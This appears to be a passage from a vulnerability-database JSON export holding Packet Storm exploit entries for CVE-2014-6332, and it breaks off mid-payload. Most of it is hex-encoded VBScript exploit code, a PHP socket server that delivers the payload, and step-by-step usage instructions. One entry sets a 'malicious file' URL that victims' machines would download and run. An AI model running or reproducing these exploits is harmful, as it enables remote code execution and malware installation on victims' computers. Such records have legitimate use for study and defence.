x45\\x22\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x65\\x28\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x52\\x61\\x6E\\x64\\x6F\\x6D\\x69\\x7A\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\
\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x61\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x62\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x30\\x3D\\x31\\x33\\x2B\\x31\\x37\\x2A\\x72\\x6E\\x64\\x28\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x33\\x3D\\x37\\x2B\\x33\\x2A\\x72\\x6E\\x64\\x28\\x35\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x64\\x69\\x6D\\x20\\x69\\x0D\\x0A\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x46\\x6F\\x72\\x20\\x69\\x20\\x3D\\x20\\x30\\x20\\x54\\x6F\\x20\\x34\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x46\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x0D\\x0A\\x20\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x73\\x75\\x62\\x20\\x74\\x65\\x73\\x74\\x61\\x61\\x28\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x73\\x75\\x62\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x74\\x65\\x73\\x74\\x61\\x61\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x6E\\x75\\x6C\\x6C\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\
\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x69\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x36\\x2E\\x33\\x36\\x35\\x39\\x38\\x37\\x33\\x37\\x34\\x33\\x37\\x38\\x30\\x31\\x45\\x2D\\x33\\x31\\x34\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x37\\x34\\x30\\x38\\x38\\x35\\x33\\x34\\x37\\x33\\x31\\x33\\x32\\x34\\x45\\x2D\\x33\\x31\\x30\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x3D\\x61\\x61\\x28\\x61\\x31\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x38\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x31\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x33\\x34\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x66\\x6F\\x72\\x20\\x6B\\x3D\\x30\\x20\\x74\\x6F\\x20\\x26\\x68\\x36\\x30\\x20\\x73\\x74\\x65\\x70\\x20\\x34\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x6A\\x3D\\x31\\x34\
\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x28\\x69\\x2B\\x26\\x68\\x31\\x31\\x63\\x2B\\x6B\\x29\\x3D\\x61\\x62\\x28\\x34\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x66\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6E\\x65\\x78\\x74\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x64\\x69\\x6D\\x20\\x74\\x79\\x70\
\x65\\x31\\x2C\\x74\\x79\\x70\\x65\\x32\\x2C\\x74\\x79\\x70\\x65\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x30\\x3D\\x61\\x30\\x2B\\x61\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x31\\x3D\\x61\\x30\\x2B\\x32\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x32\\x3D\\x61\\x30\\x2B\\x26\\x68\\x38\\x30\\x30\\x30\\x30\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x3D\\x31\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6D\\x65\\x6D\\x3D\\x63\\x69\\x6E\\x74\\x28\\x61\\x30\\x2B\\x31\\x29\\x2A\\x31\\x36\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\
\x61\\x31\\x2D\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x28\\x6A\\x3D\\x6D\\x65\\x6D\\x2B\\x34\\x29\\x20\\x6F\\x72\\x20\\x28\\x6A\\x2A\\x38\\x3D\\x6D\\x65\\x6D\\x2B\\x38\\x29\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\
\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x32\\x66\\x36\\x36\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x42\\x39\\x41\\x44\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\
\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6D\\x28\\x61\\x64\\x64\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x61\\x64\\x64\\x2B\\x34\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6D\\x3D\\x6C\\x65\\x6E\\x62\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x3C\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x3C\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x41\\x76\\x61\\x6E\\x74\\x20\\x42\\x72\\x6F\\x77\\x73\\x65\\x72\\x20\\x52\\x65\\x6D\\x6F\\x74\\x65\\x20\\x43\\x6F\\x64\\x65\\x20\\x45\\x78\\x65\\x63\\x75\\x74\\x69\\x6F\\x6E\\x20\\x44\\x65\\x6D\\x6F\\x3C\\x2F\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x0D\\x0A\\x20\\x3C\
\x62\\x72\\x20\\x2F\\x3E\\x0D\\x0A\\x20\\x3C\\x69\\x3E\\x45\\x68\\x73\\x61\\x6E\\x20\\x4E\\x6F\\x72\\x65\\x64\\x64\\x69\\x6E\\x69\\x20\\x2D\\x20\\x40\\x70\\x72\\x6F\\x74\\x33\\x63\\x74\\x30\\x72\\x3C\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x3C\\x69\\x3E\\x65\\x68\\x73\\x61\\x6E\\x6E\\x2E\\x69\\x6E\\x66\\x6F\\x3C\\x2F\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x2F\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x3C\\x2F\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x74\\x6D\\x6C\\x3E\"; \n$msgd=str_replace(\"DOWNLOAD\",$link,$msgd); \nfor (;;) { \nif ($client = @socket_accept($socket)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . \n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134053/avantbrowser-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:18:38", "description": "", "cvss3": {}, "published": "2015-10-22T00:00:00", "type": "packetstorm", "title": "HTML Compiler Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-10-22T00:00:00", "id": "PACKETSTORM:134062", "href": "https://packetstormsecurity.com/files/134062/HTML-Compiler-Remote-Code-Execution.html", "sourceData": "` \n#!/usr/bin/php \n<?php \n########################################################## \n# Title : HTML Compiler Remote Code Execution \n# HTML Compiler is a program that allows you to put an entire HTML application into a standalone Windows application. 
\n# Author : Ehsan Noreddini \n# E-Mail : me@ehsann.info \n# Social : @prot3ct0r \n########################################################## \n# CVE : CVE2014-6332 \n# Tested on : Windows7 \n# Download : http://html-compiler.en.softonic.com/ \n# Website : http://htmlcompiler.com/ \n########################################################## \n# 1 . run php code : php exploit.php \n# 2 . open \"HTML Compiler\" \n# 3 . File -> New Project -> Choose here your site index file \n# 4 . browse loader.html \n# 5 . Enjoy ! \n########################################################## \n# loader.html source code : \n# \n# <html><head><title>poc</title><META http-equiv=\"refresh\" content=\"0;URL=[Your IP Address]\"></head></html> \n########################################################## \n# proof : http://ehsann.info/proof/HTML_Compiler_Remote_Code_Execute.png \n########################################################## \n \nprint \"Exploit Started ! \\r\\n\"; \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your malicious file \n$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($socket, 0,$port); \nsocket_listen($socket); \n# MS14-064 \n$msgd = 
\"\\x3C\\x68\\x74\\x6D\\x6C\\x3E\\x0D\\x0A\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\\x71\\x75\\x69\\x76\\x3D\\x22\\x58\\x2D\\x55\\x41\\x2D\\x43\\x6F\\x6D\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\\x49\\x45\\x3D\\x45\\x6D\\x75\\x6C\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3E\\x0D\\x0A\\x3C\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\